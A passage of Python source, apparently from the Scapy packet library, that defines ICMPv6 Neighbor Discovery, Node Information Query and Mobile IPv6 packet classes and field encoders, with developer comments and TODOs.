ByteField("type",18), 1809 ByteField("len", 3), 1810 ByteField("optcode", 0), 1811 ByteField("plen", 64), 1812 IntField("res", 0), 1813 IP6Field("prefix", "::") ] 1814 1815_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1816 1: "LLA for the new AP", 1817 2: "LLA of the MN", 1818 3: "LLA of the NAR", 1819 4: "LLA of the src of TrSolPr or PrRtAdv msg", 1820 5: "AP identified by LLA belongs to current iface of router", 1821 6: "No preifx info available for AP identified by the LLA", 1822 7: "No fast handovers support for AP identified by the LLA" } 1823 1824class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1825 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" 1826 fields_desc = [ ByteField("type", 19), 1827 ByteField("len", 1), 1828 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 1829 MACField("lla", ETHER_ANY) ] # We only support ethernet 1830 1831class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 1832 name = "ICMPv6 Neighbor Discovery - MAP Option" 1833 fields_desc = [ ByteField("type", 23), 1834 ByteField("len", 3), 1835 BitField("dist", 1, 4), 1836 BitField("pref", 15, 4), # highest availability 1837 BitField("R", 1, 1), 1838 BitField("res", 0, 7), 1839 IntField("validlifetime", 0xffffffff), 1840 IP6Field("addr", "::") ] 1841 1842 1843class _IP6PrefixField(IP6Field): 1844 __slots__ = ["length_from"] 1845 def __init__(self, name, default): 1846 IP6Field.__init__(self, name, default) 1847 self.length_from = lambda pkt: 8*(pkt.len - 1) 1848 1849 def addfield(self, pkt, s, val): 1850 return s + self.i2m(pkt, val) 1851 1852 def getfield(self, pkt, s): 1853 l = self.length_from(pkt) 1854 p = s[:l] 1855 if l < 16: 1856 p += b'\x00'*(16-l) 1857 return s[l:], self.m2i(pkt,p) 1858 1859 def i2len(self, pkt, x): 1860 return len(self.i2m(pkt, x)) 1861 1862 def i2m(self, pkt, x): 1863 l = pkt.len 1864 1865 if x is None: 1866 x = "::" 1867 if l is None: 1868 l = 1 1869 x = inet_pton(socket.AF_INET6, x) 1870 1871 if l is None: 1872 return x 1873 if l in [0, 1]: 1874 return b"" 1875 if l in [2, 3]: 1876 return x[:8*(l-1)] 1877 1878 return x + b'\x00'*8*(l-3) 1879 1880class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 1881 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 1882 fields_desc = [ ByteField("type",24), 1883 FieldLenField("len", None, length_of="prefix", fmt="B", 1884 adjust = lambda pkt,x: x//8 + 1), 1885 ByteField("plen", None), 1886 BitField("res1",0,3), 1887 BitField("prf",0,2), 1888 BitField("res2",0,3), 1889 IntField("rtlifetime", 0xffffffff), 1890 _IP6PrefixField("prefix", None) ] 1891 1892class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 1893 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 1894 fields_desc = [ ByteField("type", 25), 1895 FieldLenField("len", None, count_of="dns", fmt="B", 1896 adjust = lambda pkt,x: 2*x+1), 1897 ShortField("res", None), 1898 IntField("lifetime", 0xffffffff), 1899 IP6ListField("dns", [], 1900 length_from = lambda pkt: 8*(pkt.len-1)) ] 1901 1902class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 1903 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 1904 fields_desc = [ ByteField("type", 26), 1905 ByteField("len", 1), 1906 BitField("res", 0, 48) ] 1907 1908# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 1909# described in section 3.1 of RFC 1035 1910# XXX Label should be at most 63 octets in length : we do not enforce it 1911# Total length of domain should be 255 : we do not enforce it either 1912class DomainNameListField(StrLenField): 1913 __slots__ = ["padded"] 1914 islist = 1 1915 padded_unit = 8 1916 1917 def __init__(self, name, default, fld=None, length_from=None, padded=False): 1918 self.padded = padded 1919 StrLenField.__init__(self, name, default, fld, length_from) 1920 1921 def i2len(self, pkt, x): 1922 return len(self.i2m(pkt, x)) 1923 1924 def m2i(self, pkt, x): 1925 x = plain_str(x) # Decode bytes to string 1926 res = [] 1927 while x: 1928 # Get a name until \x00 is reached 1929 cur = [] 1930 while x and ord(x[0]) != 0: 1931 l = ord(x[0]) 1932 cur.append(x[1:l+1]) 1933 x = x[l+1:] 1934 if self.padded: 1935 # Discard following \x00 in padded mode 1936 if len(cur): 1937 res.append(".".join(cur) + ".") 1938 else: 1939 # Store the current name 1940 res.append(".".join(cur) + ".") 1941 if x and ord(x[0]) == 0: 1942 x = x[1:] 1943 return res 1944 1945 def i2m(self, pkt, x): 1946 def conditionalTrailingDot(z): 1947 if z and orb(z[-1]) == 0: 1948 return z 1949 return z+b'\x00' 1950 # Build the encode names 1951 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes 1952 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 1953 1954 # In padded mode, add some \x00 bytes 1955 if self.padded and not len(ret_string) % self.padded_unit == 0: 1956 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) 1957 1958 return ret_string 1959 1960class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 1961 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 1962 fields_desc = [ ByteField("type", 31), 1963 FieldLenField("len", None, length_of="searchlist", fmt="B", 1964 adjust=lambda pkt, x: 1+ x//8), 1965 ShortField("res", None), 1966 IntField("lifetime", 0xffffffff), 1967 DomainNameListField("searchlist", [], 1968 length_from=lambda pkt: 8*pkt.len -8, 1969 padded=True) 1970 ] 1971 1972# End of ICMPv6 Neighbor Discovery Options. 1973 1974class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 1975 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 1976 fields_desc = [ ByteEnumField("type", 133, icmp6types), 1977 ByteField("code",0), 1978 XShortField("cksum", None), 1979 IntField("res",0) ] 1980 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }} 1981 1982class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 1983 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 1984 fields_desc = [ ByteEnumField("type", 134, icmp6types), 1985 ByteField("code",0), 1986 XShortField("cksum", None), 1987 ByteField("chlim",0), 1988 BitField("M",0,1), 1989 BitField("O",0,1), 1990 BitField("H",0,1), 1991 BitEnumField("prf",1,2, { 0: "Medium (default)", 1992 1: "High", 1993 2: "Reserved", 1994 3: "Low" } ), # RFC 4191 1995 BitField("P",0,1), 1996 BitField("res",0,2), 1997 ShortField("routerlifetime",1800), 1998 IntField("reachabletime",0), 1999 IntField("retranstimer",0) ] 2000 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} 2001 2002 def answers(self, other): 2003 return isinstance(other, ICMPv6ND_RS) 2004 2005class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2006 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 2007 fields_desc = [ ByteEnumField("type",135, icmp6types), 2008 ByteField("code",0), 2009 XShortField("cksum", None), 2010 IntField("res", 0), 2011 IP6Field("tgt","::") ] 2012 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} 2013 2014 def mysummary(self): 2015 return self.sprintf("%name% (tgt: %tgt%)") 2016 2017 def hashret(self): 2018 return raw(self.tgt)+self.payload.hashret() 2019 2020class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2021 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 2022 fields_desc = [ ByteEnumField("type",136, icmp6types), 2023 ByteField("code",0), 2024 XShortField("cksum", None), 2025 BitField("R",1,1), 2026 BitField("S",0,1), 2027 BitField("O",1,1), 2028 XBitField("res",0,29), 2029 IP6Field("tgt","::") ] 2030 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} 2031 2032 def mysummary(self): 2033 return self.sprintf("%name% (tgt: %tgt%)") 2034 2035 def hashret(self): 2036 return raw(self.tgt)+self.payload.hashret() 2037 2038 def answers(self, other): 2039 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 2040 2041# associated possible options : target link-layer option, Redirected header 2042class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 2043 name = "ICMPv6 Neighbor Discovery - Redirect" 2044 fields_desc = [ ByteEnumField("type",137, icmp6types), 2045 ByteField("code",0), 2046 XShortField("cksum", None), 2047 XIntField("res",0), 2048 IP6Field("tgt","::"), 2049 IP6Field("dst","::") ] 2050 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} 2051 2052 2053 2054################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ############### 2055 2056class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 2057 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 2058 fields_desc = [ ByteField("type",9), 2059 FieldLenField("len", None, count_of="addrlist", fmt="B", 2060 adjust = lambda pkt,x: 2*x+1), 2061 StrFixedLenField("res", b"\x00"*6, 6), 2062 IP6ListField("addrlist", [], 2063 length_from = lambda pkt: 8*(pkt.len-1)) ] 2064 2065class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 2066 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 2067 type = 10 2068 2069 2070# RFC3122 2071# Options requises : source lladdr et target lladdr 2072# Autres options valides : source address list, MTU 2073# - Comme precise dans le document, il serait bien de prendre l'adresse L2 2074# demandee dans l'option requise target lladdr et l'utiliser au niveau 2075# de l'adresse destination ethernet si aucune adresse n'est precisee 2076# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 2077# les options. 2078# Ether() must use the target lladdr as destination 2079class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 2080 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 2081 fields_desc = [ ByteEnumField("type",141, icmp6types), 2082 ByteField("code",0), 2083 XShortField("cksum",None), 2084 XIntField("reserved",0) ] 2085 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} 2086 2087# Options requises : target lladdr, target address list 2088# Autres options valides : MTU 2089class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 2090 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 2091 fields_desc = [ ByteEnumField("type",142, icmp6types), 2092 ByteField("code",0), 2093 XShortField("cksum",None), 2094 XIntField("reserved",0) ] 2095 overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} 2096 2097 2098############################################################################### 2099# ICMPv6 Node Information Queries (RFC 4620) 2100############################################################################### 2101 2102# [ ] Add automatic destination address computation using computeNIGroupAddr 2103# in IPv6 class (Scapy6 modification when integrated) if : 2104# - it is not provided 2105# - upper layer is ICMPv6NIQueryName() with a valid value 2106# [ ] Try to be liberal in what we accept as internal values for _explicit_ 2107# DNS elements provided by users. Any string should be considered 2108# valid and kept like it has been provided. At the moment, i2repr() will 2109# crash on many inputs 2110# [ ] Do the documentation 2111# [ ] Add regression tests 2112# [ ] Perform test against real machines (NOOP reply is proof of implementation). 2113# [ ] Check if there are differences between different stacks. Among *BSD, 2114# with others. 2115# [ ] Deal with flags in a consistent way. 2116# [ ] Implement compression in names2dnsrepr() and decompresiion in 2117# dnsrepr2names(). Should be deactivable. 2118 2119icmp6_niqtypes = { 0: "NOOP", 2120 2: "Node Name", 2121 3: "IPv6 Address", 2122 4: "IPv4 Address" } 2123 2124 2125class _ICMPv6NIHashret: 2126 def hashret(self): 2127 return self.nonce 2128 2129class _ICMPv6NIAnswers: 2130 def answers(self, other): 2131 return self.nonce == other.nonce 2132 2133# Buggy; always returns the same value during a session 2134class NonceField(StrFixedLenField): 2135 def __init__(self, name, default=None): 2136 StrFixedLenField.__init__(self, name, default, 8) 2137 if default is None: 2138 self.default = self.randval() 2139 2140@conf.commands.register 2141def computeNIGroupAddr(name): 2142 """Compute the NI group Address. Can take a FQDN as input parameter""" 2143 name = name.lower().split(".")[0] 2144 record = chr(len(name))+name 2145 h = md5(record.encode("utf8")) 2146 h = h.digest() 2147 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 2148 return addr 2149 2150 2151# Here is the deal. First, that protocol is a piece of shit. Then, we 2152# provide 4 classes for the different kinds of Requests (one for every 2153# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 2154# data field class that is made to be smart by guessing the specific 2155# type of value provided : 2156# 2157# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 2158# if not overridden by user 2159# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 2160# if not overridden 2161# - Name in the other cases: code is set to 0, if not overridden by user 2162# 2163# Internal storage, is not only the value, but the a pair providing 2164# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 2165# 2166# Note : I merged getfield() and m2i(). m2i() should not be called 2167# directly anyway. Same remark for addfield() and i2m() 2168# 2169# -- arno 2170 2171# "The type of information present in the Data field of a query is 2172# declared by the ICMP Code, whereas the type of information in a 2173# Reply is determined by the Qtype" 2174 2175def names2dnsrepr(x): 2176 """ 2177 Take as input a list of DNS names or a single DNS name 2178 and encode it in DNS format (with possible compression) 2179 If a string that is already a DNS name in DNS format 2180 is passed, it is returned unmodified. Result is a string. 2181 !!! At the moment, compression is not implemented !!! 2182 """ 2183 2184 if isinstance(x, bytes): 2185 if x and x[-1:] == b'\x00': # stupid heuristic 2186 return x 2187 x = [x] 2188 2189 res = [] 2190 for n in x: 2191 termin = b"\x00" 2192 if n.count(b'.') == 0: # single-component gets one more 2193 termin += b'\x00' 2194 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 2195 res.append(n) 2196 return b"".join(res) 2197 2198 2199def dnsrepr2names(x): 2200 """ 2201 Take as input a DNS encoded string (possibly compressed) 2202 and returns a list of DNS names contained in it. 2203 If provided string is already in printable format 2204 (does not end with a null character, a one element list 2205 is returned). Result is a list. 2206 """ 2207 res = [] 2208 cur = b"" 2209 while x: 2210 l = orb(x[0]) 2211 x = x[1:] 2212 if not l: 2213 if cur and cur[-1:] == b'.': 2214 cur = cur[:-1] 2215 res.append(cur) 2216 cur = b"" 2217 if x and orb(x[0]) == 0: # single component 2218 x = x[1:] 2219 continue 2220 if l & 0xc0: # XXX TODO : work on that -- arno 2221 raise Exception("DNS message can't be compressed at this point!") 2222 cur += x[:l] + b"." 2223 x = x[l:] 2224 return res 2225 2226 2227class NIQueryDataField(StrField): 2228 def __init__(self, name, default): 2229 StrField.__init__(self, name, default) 2230 2231 def i2h(self, pkt, x): 2232 if x is None: 2233 return x 2234 t,val = x 2235 if t == 1: 2236 val = dnsrepr2names(val)[0] 2237 return val 2238 2239 def h2i(self, pkt, x): 2240 if x is tuple and isinstance(x[0], int): 2241 return x 2242 2243 # Try IPv6 2244 try: 2245 inet_pton(socket.AF_INET6, x.decode()) 2246 return (0, x.decode()) 2247 except: 2248 pass 2249 # Try IPv4 2250 try: 2251 inet_pton(socket.AF_INET, x.decode()) 2252 return (2, x.decode()) 2253 except: 2254 pass 2255 # Try DNS 2256 if x is None: 2257 x = b"" 2258 x = names2dnsrepr(x) 2259 return (1, x) 2260 2261 def i2repr(self, pkt, x): 2262 x = plain_str(x) 2263 t,val = x 2264 if t == 1: # DNS Name 2265 # we don't use dnsrepr2names() to deal with 2266 # possible weird data extracted info 2267 res = [] 2268 while val: 2269 l = orb(val[0]) 2270 val = val[1:] 2271 if l == 0: 2272 break 2273 res.append(val[:l]+".") 2274 val = val[l:] 2275 tmp = "".join(res) 2276 if tmp and tmp[-1] == '.': 2277 tmp = tmp[:-1] 2278 return tmp 2279 return repr(val) 2280 2281 def getfield(self, pkt, s): 2282 qtype = getattr(pkt, "qtype") 2283 if qtype == 0: # NOOP 2284 return s, (0, b"") 2285 else: 2286 code = getattr(pkt, "code") 2287 if code == 0: # IPv6 Addr 2288 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 2289 elif code == 2: # IPv4 Addr 2290 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 2291 else: # Name or Unknown 2292 return b"", (1, s) 2293 2294 def addfield(self, pkt, s, val): 2295 if ((isinstance(val, tuple) and val[1] is None) or 2296 val is None): 2297 val = (1, b"") 2298 t = val[0] 2299 if t == 1: 2300 return s + val[1] 2301 elif t == 0: 2302 return s + inet_pton(socket.AF_INET6, val[1]) 2303 else: 2304 return s + inet_pton(socket.AF_INET, val[1]) 2305 2306class NIQueryCodeField(ByteEnumField): 2307 def i2m(self, pkt, x): 2308 if x is None: 2309 d = pkt.getfieldval("data") 2310 if d is None: 2311 return 1 2312 elif d[0] == 0: # IPv6 address 2313 return 0 2314 elif d[0] == 1: # Name 2315 return 1 2316 elif d[0] == 2: # IPv4 address 2317 return 2 2318 else: 2319 return 1 2320 return x 2321 2322 2323_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 2324 2325#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 2326# 8: "Link-local addresses", 16: "Site-local addresses", 2327# 32: "Global addresses" } 2328 2329# "This NI type has no defined flags and never has a Data Field". Used 2330# to know if the destination is up and implements NI protocol. 2331class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 2332 name = "ICMPv6 Node Information Query - NOOP Query" 2333 fields_desc = [ ByteEnumField("type", 139, icmp6types), 2334 NIQueryCodeField("code", None, _niquery_code), 2335 XShortField("cksum", None), 2336 ShortEnumField("qtype", 0, icmp6_niqtypes), 2337 BitField("unused", 0, 10), 2338 FlagsField("flags", 0, 6, "TACLSG"), 2339 NonceField("nonce", None), 2340 NIQueryDataField("data", None) ] 2341 2342class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 2343 name = "ICMPv6 Node Information Query - IPv6 Name Query" 2344 qtype = 2 2345 2346# We ask for the IPv6 address of the peer 2347class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 2348 name = "ICMPv6 Node Information Query - IPv6 Address Query" 2349 qtype = 3 2350 flags = 0x3E 2351 2352class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 2353 name = "ICMPv6 Node Information Query - IPv4 Address Query" 2354 qtype = 4 2355 2356_nireply_code = { 0: "Successful Reply", 2357 1: "Response Refusal", 2358 3: "Unknown query type" } 2359 2360_nireply_flags = { 1: "Reply set incomplete", 2361 2: "All unicast addresses", 2362 4: "IPv4 addresses", 2363 8: "Link-local addresses", 2364 16: "Site-local addresses", 2365 32: "Global addresses" } 2366 2367# Internal repr is one of those : 2368# (0, "some string") : unknow qtype value are mapped to that one 2369# (3, [ (ttl, ip6), ... ]) 2370# (4, [ (ttl, ip4), ... ]) 2371# (2, [ttl, dns_names]) : dns_names is one string that contains 2372# all the DNS names. Internally it is kept ready to be sent 2373# (undissected). i2repr() decode it for user. This is to 2374# make build after dissection bijective. 2375# 2376# I also merged getfield() and m2i(), and addfield() and i2m(). 2377class NIReplyDataField(StrField): 2378 2379 def i2h(self, pkt, x): 2380 if x is None: 2381 return x 2382 t,val = x 2383 if t == 2: 2384 ttl, dnsnames = val 2385 val = [ttl] + dnsrepr2names(dnsnames) 2386 return val 2387 2388 def h2i(self, pkt, x): 2389 qtype = 0 # We will decode it as string if not 2390 # overridden through 'qtype' in pkt 2391 2392 # No user hint, let's use 'qtype' value for that purpose 2393 if not isinstance(x, tuple): 2394 if pkt is not None: 2395 qtype = pkt.qtype 2396 else: 2397 qtype = x[0] 2398 x = x[1] 2399 2400 # From that point on, x is the value (second element of the tuple) 2401 2402 if qtype == 2: # DNS name 2403 if isinstance(x, (str, bytes)): # listify the string 2404 x = [x] 2405 if isinstance(x, list): 2406 x = [val.encode() if isinstance(val, str) else val for val in x] 2407 if x and isinstance(x[0], six.integer_types): 2408 ttl = x[0] 2409 names = x[1:] 2410 else: 2411 ttl = 0 2412 names = x 2413 return (2, [ttl, names2dnsrepr(names)]) 2414 2415 elif qtype in [3, 4]: # IPv4 or IPv6 addr 2416 if not isinstance(x, list): 2417 x = [x] # User directly provided an IP, instead of list 2418 2419 def fixvalue(x): 2420 # List elements are not tuples, user probably 2421 # omitted ttl value : we will use 0 instead 2422 if not isinstance(x, tuple): 2423 x = (0, x) 2424 # Decode bytes 2425 if six.PY3 and isinstance(x[1], bytes): 2426 x = (x[0], x[1].decode()) 2427 return x 2428 2429 return (qtype, [fixvalue(d) for d in x]) 2430 2431 return (qtype, x) 2432 2433 2434 def addfield(self, pkt, s, val): 2435 t,tmp = val 2436 if tmp is None: 2437 tmp = b"" 2438 if t == 2: 2439 ttl,dnsstr = tmp 2440 return s+ struct.pack("!I", ttl) + dnsstr 2441 elif t == 3: 2442 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0])+inet_pton(socket.AF_INET6, x_y1[1]), tmp)) 2443 elif t == 4: 2444 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0])+inet_pton(socket.AF_INET, x_y2[1]), tmp)) 2445 else: 2446 return s + tmp 2447 2448 def getfield(self, pkt, s): 2449 code = getattr(pkt, "code") 2450 if code != 0: 2451 return s, (0, b"") 2452 2453 qtype = getattr(pkt, "qtype") 2454 if qtype == 0: # NOOP 2455 return s, (0, b"") 2456 2457 elif qtype == 2: 2458 if len(s) < 4: 2459 return s, (0, b"") 2460 ttl = struct.unpack("!I", s[:4])[0] 2461 return b"", (2, [ttl, s[4:]]) 2462 2463 elif qtype == 3: # IPv6 addresses with TTLs 2464 # XXX TODO : get the real length 2465 res = [] 2466 while len(s) >= 20: # 4 + 16 2467 ttl = struct.unpack("!I", s[:4])[0] 2468 ip = inet_ntop(socket.AF_INET6, s[4:20]) 2469 res.append((ttl, ip)) 2470 s = s[20:] 2471 return s, (3, res) 2472 2473 elif qtype == 4: # IPv4 addresses with TTLs 2474 # XXX TODO : get the real length 2475 res = [] 2476 while len(s) >= 8: # 4 + 4 2477 ttl = struct.unpack("!I", s[:4])[0] 2478 ip = inet_ntop(socket.AF_INET, s[4:8]) 2479 res.append((ttl, ip)) 2480 s = s[8:] 2481 return s, (4, res) 2482 else: 2483 # XXX TODO : implement me and deal with real length 2484 return b"", (0, s) 2485 2486 def i2repr(self, pkt, x): 2487 if x is None: 2488 return "[]" 2489 2490 if isinstance(x, tuple) and len(x) == 2: 2491 t, val = x 2492 if t == 2: # DNS names 2493 ttl,l = val 2494 l = dnsrepr2names(l) 2495 return "ttl:%d %s" % (ttl, ", ".join(l)) 2496 elif t == 3 or t == 4: 2497 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) 2498 return repr(val) 2499 return repr(x) # XXX should not happen 2500 2501# By default, sent responses have code set to 0 (successful) 2502class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 2503 name = "ICMPv6 Node Information Reply - NOOP Reply" 2504 fields_desc = [ ByteEnumField("type", 140, icmp6types), 2505 ByteEnumField("code", 0, _nireply_code), 2506 XShortField("cksum", None), 2507 ShortEnumField("qtype", 0, icmp6_niqtypes), 2508 BitField("unused", 0, 10), 2509 FlagsField("flags", 0, 6, "TACLSG"), 2510 NonceField("nonce", None), 2511 NIReplyDataField("data", None)] 2512 2513class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 2514 name = "ICMPv6 Node Information Reply - Node Names" 2515 qtype = 2 2516 2517class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 2518 name = "ICMPv6 Node Information Reply - IPv6 addresses" 2519 qtype = 3 2520 2521class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 2522 name = "ICMPv6 Node Information Reply - IPv4 addresses" 2523 qtype = 4 2524 2525class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 2526 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 2527 code = 1 2528 2529class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 2530 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 2531 code = 2 2532 2533 2534def _niquery_guesser(p): 2535 cls = conf.raw_layer 2536 type = orb(p[0]) 2537 if type == 139: # Node Info Query specific stuff 2538 if len(p) > 6: 2539 qtype, = struct.unpack("!H", p[4:6]) 2540 cls = { 0: ICMPv6NIQueryNOOP, 2541 2: ICMPv6NIQueryName, 2542 3: ICMPv6NIQueryIPv6, 2543 4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer) 2544 elif type == 140: # Node Info Reply specific stuff 2545 code = orb(p[1]) 2546 if code == 0: 2547 if len(p) > 6: 2548 qtype, = struct.unpack("!H", p[4:6]) 2549 cls = { 2: ICMPv6NIReplyName, 2550 3: ICMPv6NIReplyIPv6, 2551 4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP) 2552 elif code == 1: 2553 cls = ICMPv6NIReplyRefuse 2554 elif code == 2: 2555 cls = ICMPv6NIReplyUnknown 2556 return cls 2557 2558 2559############################################################################# 2560############################################################################# 2561### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ### 2562############################################################################# 2563############################################################################# 2564 2565# Mobile IPv6 ICMPv6 related classes 2566 2567class ICMPv6HAADRequest(_ICMPv6): 2568 name = 'ICMPv6 Home Agent Address Discovery Request' 2569 fields_desc = [ ByteEnumField("type", 144, icmp6types), 2570 ByteField("code", 0), 2571 XShortField("cksum", None), 2572 XShortField("id", None), 2573 BitEnumField("R", 1, 1, {1: 'MR'}), 2574 XBitField("res", 0, 15) ] 2575 def hashret(self): 2576 return struct.pack("!H",self.id)+self.payload.hashret() 2577 2578class ICMPv6HAADReply(_ICMPv6): 2579 name = 'ICMPv6 Home Agent Address Discovery Reply' 2580 fields_desc = [ ByteEnumField("type", 145, icmp6types), 2581 ByteField("code", 0), 2582 XShortField("cksum", None), 2583 XShortField("id", None), 2584 BitEnumField("R", 1, 1, {1: 'MR'}), 2585 XBitField("res", 0, 15), 2586 IP6ListField('addresses', None) ] 2587 def hashret(self): 2588 return struct.pack("!H",self.id)+self.payload.hashret() 2589 2590 def answers(self, other): 2591 if not isinstance(other, ICMPv6HAADRequest): 2592 return 0 2593 return self.id == other.id 2594 2595class ICMPv6MPSol(_ICMPv6): 2596 name = 'ICMPv6 Mobile Prefix Solicitation' 2597 fields_desc = [ ByteEnumField("type", 146, icmp6types), 2598 ByteField("code", 0), 2599 XShortField("cksum", None), 2600 XShortField("id", None), 2601 XShortField("res", 0) ] 2602 def _hashret(self): 2603 return struct.pack("!H",self.id) 2604 2605class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 2606 name = 'ICMPv6 Mobile Prefix Advertisement' 2607 fields_desc = [ ByteEnumField("type", 147, icmp6types), 2608 ByteField("code", 0), 2609 XShortField("cksum", None), 2610 XShortField("id", None), 2611 BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}), 2612 XBitField("res", 0, 14) ] 2613 def hashret(self): 2614 return struct.pack("!H",self.id) 2615 2616 def answers(self, other): 2617 return isinstance(other, ICMPv6MPSol) 2618 2619# Mobile IPv6 Options classes 2620 2621 2622_mobopttypes = { 2: "Binding Refresh Advice", 2623 3: "Alternate Care-of Address", 2624 4: "Nonce Indices", 2625 5: "Binding Authorization Data", 2626 6: "Mobile Network Prefix (RFC3963)", 2627 7: "Link-Layer Address (RFC4068)", 2628 8: "Mobile Node Identifier (RFC4283)", 2629 9: "Mobility Message Authentication (RFC4285)", 2630 10: "Replay Protection (RFC4285)", 2631 11: "CGA Parameters Request (RFC4866)", 2632 12: "CGA Parameters (RFC4866)", 2633 13: "Signature (RFC4866)", 2634 14: "Home Keygen Token (RFC4866)", 2635 15: "Care-of Test Init (RFC4866)", 2636 16: "Care-of Test (RFC4866)" } 2637 2638 2639class _MIP6OptAlign: 2640 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 2641 This class is inherited by all MIPv6 options to help in computing the 2642 required Padding for that option, i.e. the need for a Pad1 or PadN 2643 option before it. They only need to provide x and y as class 2644 parameters. (x=0 and y=0 are used when no alignment is required)""" 2645 def alignment_delta(self, curpos): 2646 x = self.x ; y = self.y 2647 if x == 0 and y ==0: 2648 return 0 2649 delta = x*((curpos - y + x - 1)//x) + y - curpos 2650 return delta 2651 2652 2653class MIP6OptBRAdvice(_MIP6OptAlign, Packet): 2654 name = 'Mobile IPv6 Option - Binding Refresh Advice' 2655 fields_desc = [ ByteEnumField('otype', 2, _mobopttypes), 2656 ByteField('olen', 2), 2657 ShortField('rinter', 0) ] 2658 x = 2 ; y = 0# alignment requirement: 2n 2659 2660class MIP6OptAltCoA(_MIP6OptAlign, Packet): 2661 name = 'MIPv6 Option - Alternate Care-of Address' 2662 fields_desc = [ ByteEnumField('otype', 3, _mobopttypes), 2663 ByteField('olen', 16), 2664 IP6Field("acoa", "::") ] 2665 x = 8 ; y = 6 # alignment requirement: 8n+6 2666 2667class MIP6OptNonceIndices(_MIP6OptAlign, Packet): 2668 name = 'MIPv6 Option - Nonce Indices' 2669 fields_desc = [ ByteEnumField('otype', 4, _mobopttypes), 2670 ByteField('olen', 16), 2671 ShortField('hni', 0), 2672 ShortField('coni', 0) ] 2673 x = 2 ; y = 0 # alignment requirement: 2n 2674 2675class MIP6OptBindingAuthData(_MIP6OptAlign, Packet): 2676 name = 'MIPv6 Option - Binding Authorization 